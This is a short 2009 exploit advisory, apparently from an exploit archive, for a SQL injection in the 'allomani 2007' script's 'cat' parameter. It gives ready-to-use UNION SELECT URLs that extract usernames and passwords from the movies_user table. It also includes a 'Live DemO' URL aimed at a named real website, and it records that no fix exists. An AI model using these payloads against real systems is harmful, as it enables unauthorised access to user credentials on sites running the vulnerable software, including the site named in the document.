allomani 2007 (cat) Remote SQL Injection Vulnerability

2009-08-26 00:04:58

==================

NaMe: allomani 2007 <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: [email protected]

==================

Script site : http://allomani.com

==================

ExplOiT:

UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

:)

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user



+========================================================+
|
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~
| And All Friends!!!!
+========================================================+

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.